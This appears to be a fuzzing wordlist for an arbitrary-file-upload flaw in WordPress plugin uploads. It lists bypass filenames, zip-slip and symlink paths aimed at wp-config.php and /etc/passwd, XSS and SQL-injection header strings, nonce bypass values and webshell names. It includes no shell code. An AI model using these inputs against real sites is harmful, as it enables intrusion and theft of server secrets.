# CVE-2026-28516: WordPress Plugin Upload Arbitrary File Upload
# Severity: Critical (CVSS 9.9)
# Affected Versions: WordPress 6.4.0 - 6.4.3
# Description: Arbitrary file upload vulnerability in the WordPress plugin upload
# mechanism, allowing remote code execution through malicious plugin packages
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28516

# Basic Plugin Upload Bypass
# POST to /wp-admin/update.php?action=upload-plugin
# POST to /wp-admin/plugin-install.php?tab=upload

# Malicious Plugin Package Names (for testing detection)
malicious-plugin.zip
backdoor-plugin.zip
shell-plugin.zip
webshell.zip
evil-plugin.zip

# Double Extension Bypass
plugin.php.zip
plugin.zip.php
backdoor.tar.gz.php
shell.phar.zip

# Null Byte Injection
plugin.zip%00.php
backdoor.zip%00.txt
shell.zip\x00.jpg
malicious.zip%00.png

# MIME Type Confusion
# Content-Type: application/zip (but contains PHP)
# Content-Type: application/x-zip-compressed
# Content-Type: multipart/form-data
# Content-Type: application/octet-stream

# Path Traversal in Plugin Upload
../../wp-content/plugins/malicious/shell.php
../../../wp-content/themes/shell.php
../../../../wp-content/uploads/shell.php
../../wp-includes/shell.php

# Zip Slip Vulnerability Payloads
# ZIP entries whose stored paths are:
../../../wp-content/plugins/akismet/shell.php
../../wp-content/themes/twentytwentyfour/shell.php
../../../../wp-config.php
../../../.htaccess

# Symlink Attack in ZIP
# Symlink entries inside the ZIP that point to:
../../wp-config.php
../../../etc/passwd
../../wp-content/debug.log

# Plugin Metadata Manipulation
# In plugin header:
# Plugin Name: Legitimate Plugin<script>alert(1)</script>
# Plugin URI: javascript:alert(1)
# Author: <img src=x onerror=alert(1)>
# Version: 1.0' OR '1'='1

# Malicious Plugin Structure
malicious-plugin/
malicious-plugin/malicious-plugin.php
malicious-plugin/includes/shell.php
malicious-plugin/admin/backdoor.php
malicious-plugin/assets/webshell.php

# PHP Web Shell Filenames (for detection testing)
shell.php
backdoor.php
c99.php
r57.php
webshell.php
cmd.php
eval.php
assert.php
system.php
passthru.php

# Obfuscated PHP Extensions
plugin.php5
plugin.php7
plugin.phtml
plugin.phar
plugin.phps
plugin.php3
plugin.php4
plugin.inc
plugin.module

# Case Variation Bypass
SHELL.PHP
Shell.Php
BACKDOOR.php
WebShell.PHP

# Alternative Archive Formats
malicious.tar
malicious.tar.gz
malicious.tar.bz2
malicious.rar
malicious.7z
malicious.phar

# Polyglot Files (ZIP + PHP)
polyglot.zip
# A file that is both a valid ZIP archive and valid PHP
# Magic bytes: PK\x03\x04 (ZIP) followed by <?php (PHP)

# Directory Traversal in ZIP Entries
plugin-name/../../../shell.php
plugin-name/../../wp-content/shell.php
plugin-name/../wp-includes/backdoor.php

# Large File Upload (DoS)
# Files larger than upload_max_filesize
# Files with excessive number of entries
# Zip bombs (small compressed, huge uncompressed)

# Special Characters in Filenames
plugin-name/shell$.php
plugin-name/back`door.php
plugin-name/web;shell.php
plugin-name/cmd|exec.php
plugin-name/shell&.php

# Unicode and Encoding Bypass
plugin-name/shell\u0000.php
plugin-name/backdoor\x00.php
plugin-name/shell%00.php
plugin-name/webshell\n.php

# Hidden Files
plugin-name/.shell.php
plugin-name/.htaccess
plugin-name/.user.ini
plugin-name/.config.php

# Trailing Non-PHP Extension Bypass (PHP handler still mapped)
plugin-name/shell.php.txt
plugin-name/backdoor.php.bak
plugin-name/webshell.php.old
plugin-name/cmd.php.disabled

# Plugin Activation Hooks Exploitation
# In main plugin file:
# register_activation_hook(__FILE__, 'malicious_function');
# add_action('init', 'backdoor_function');
# add_action('admin_init', 'shell_function');

# Auto-load Exploitation
plugin-name/vendor/autoload.php
plugin-name/composer.json
plugin-name/autoload.php

# Template File Upload
plugin-name/templates/shell.php
plugin-name/views/backdoor.php
plugin-name/pages/webshell.php

# Asset File Bypass
plugin-name/assets/js/shell.php
plugin-name/assets/css/backdoor.php
plugin-name/assets/images/shell.php.jpg

# Language File Bypass
plugin-name/languages/shell.php
plugin-name/lang/backdoor.php
plugin-name/i18n/webshell.php

# Database Migration Files
plugin-name/migrations/shell.php
plugin-name/db/backdoor.php
plugin-name/sql/webshell.php

# Configuration File Upload
plugin-name/config/shell.php
plugin-name/settings/backdoor.php
plugin-name/conf/webshell.php

# Library File Upload
plugin-name/lib/shell.php
plugin-name/libraries/backdoor.php
plugin-name/vendor/webshell.php

# Module File Upload
plugin-name/modules/shell.php
plugin-name/components/backdoor.php
plugin-name/widgets/webshell.php

# API Endpoint Files
plugin-name/api/shell.php
plugin-name/rest/backdoor.php
plugin-name/endpoints/webshell.php

# Admin Panel Files
plugin-name/admin/shell.php
plugin-name/backend/backdoor.php
plugin-name/dashboard/webshell.php

# AJAX Handler Files
plugin-name/ajax/shell.php
plugin-name/handlers/backdoor.php
plugin-name/actions/webshell.php

# Cron Job Files
plugin-name/cron/shell.php
plugin-name/scheduled/backdoor.php
plugin-name/tasks/webshell.php

# Cache Files
plugin-name/cache/shell.php
plugin-name/tmp/backdoor.php
plugin-name/temp/webshell.php

# Log Files with PHP
plugin-name/logs/shell.php
plugin-name/log/backdoor.php.log
plugin-name/debug/webshell.php

# Backup Files
plugin-name/backup/shell.php
plugin-name/backups/backdoor.php.bak
plugin-name/old/webshell.php.old

# Test Files
plugin-name/tests/shell.php
plugin-name/test/backdoor.php
plugin-name/testing/webshell.php

# Documentation Files with PHP
plugin-name/docs/shell.php
plugin-name/documentation/backdoor.php
plugin-name/readme/webshell.php

# Example Files
plugin-name/examples/shell.php
plugin-name/samples/backdoor.php
plugin-name/demo/webshell.php

# Build Files
plugin-name/build/shell.php
plugin-name/dist/backdoor.php
plugin-name/release/webshell.php

# Source Files
plugin-name/src/shell.php
plugin-name/source/backdoor.php
plugin-name/app/webshell.php

# Public Files
plugin-name/public/shell.php
plugin-name/public_html/backdoor.php
plugin-name/www/webshell.php

# Private Files
plugin-name/private/shell.php
plugin-name/protected/backdoor.php
plugin-name/secure/webshell.php

# Upload Directory Bypass
plugin-name/uploads/shell.php
plugin-name/files/backdoor.php
plugin-name/media/webshell.php

# Plugin Update Mechanism Bypass
# POST to /wp-admin/update.php?action=upload-plugin
# With a manipulated plugin slug
plugin-slug=../../../wp-content/plugins/malicious
plugin-slug=../../themes/malicious
plugin-slug=../../../../uploads/malicious

# Nonce Bypass Attempts
_wpnonce=
_wpnonce=null
_wpnonce=0
_wpnonce=invalid
_wp_http_referer=/wp-admin/

# Plugin Overwrite Attack
# Upload plugin with same slug as existing plugin
akismet/shell.php
jetpack/backdoor.php
wordfence/webshell.php
yoast-seo/cmd.php

# Theme Upload via Plugin Mechanism
theme-as-plugin/style.css
theme-as-plugin/functions.php
theme-as-plugin/shell.php

# MU-Plugin Upload
mu-plugins/shell.php
mu-plugins/backdoor.php
mu-plugins/must-use-shell.php

# Dropper Plugin Technique
# A small plugin that downloads and executes a larger payload
dropper.php
downloader.php
installer.php
updater.php

# Fileless Attack Vectors
# Plugin that stores code in database
# Plugin that uses eval() with database content
# Plugin that creates files after activation

# Plugin Dependency Exploitation
plugin-name/composer.lock
plugin-name/package.json
plugin-name/requirements.txt

# Environment File Upload
plugin-name/.env
plugin-name/.env.local
plugin-name/.env.production
plugin-name/config.ini

# Git Repository Files
plugin-name/.git/config
plugin-name/.gitignore
plugin-name/.git/hooks/post-receive

# SVN Repository Files
plugin-name/.svn/entries
plugin-name/.svn/wc.db

# IDE Configuration Files
plugin-name/.idea/workspace.xml
plugin-name/.vscode/settings.json
plugin-name/.project

# Package Manager Files
plugin-name/package-lock.json
plugin-name/yarn.lock
plugin-name/composer.lock

# Certificate Files
plugin-name/cert.pem
plugin-name/private.key
plugin-name/ssl.crt

# Database Files
plugin-name/database.sqlite
plugin-name/db.sql
plugin-name/backup.sql

# Serialized Data Files
plugin-name/data.ser
plugin-name/cache.dat
plugin-name/session.tmp
